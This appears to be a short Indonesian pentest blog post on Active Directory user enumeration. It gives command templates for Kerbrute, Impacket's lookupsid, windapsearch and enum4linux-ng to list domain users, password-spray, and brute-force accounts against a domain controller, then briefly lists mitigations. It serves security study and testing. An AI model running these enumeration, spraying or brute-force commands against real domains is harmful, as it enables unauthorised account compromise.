Part 2 - User Enumeration
Tujuan
- Get a foothold user
Prasyarat
- Memiliki akses ke RPC, atau
- Memiliki wordlist username
Tools
- Kerbrute
- Impacket
- windapsearch
Tahap eksploitasi
User Enumeration
1
2
3
4
5
6
7
8
9
10
11
# kerbrute
➜ kerbrute userenum -d <domain> --dc <ip-dc> userslist.txt
# impacket, jika SMB/RPC bisa diakses
➜ lookupsid.py anonymous@<ip-dc>
# windapsearch
➜ windapsearch -m user -d <domain> --dc <ip-dc>
# enum4linux-ng
➜ enum4linux-ng -A <ip-dc>
Password Spray
1
2
# kerbrute
➜ kerbrute passwordspray -d <domain> --dc <ip-dc> domain_users.txt <password>
Brute User
1
2
# kerbrute
➜ kerbrute bruteuser -d <domain> passwords.txt <user>
Brute Force
Langkah-langkah:
- Buat kombinasi username dan password dengan format
username:password
. - Jalankan perintah berikut:
1
➜ cat combos.lst | kerbrute -d <domain> bruteforce -
Mitigasi
- Jangan berikan akses anonymous pada RPC.
- Terapkan kebijakan password yang kuat pada setiap pengguna.
Referensi
This post is licensed under CC BY 4.0 by the author.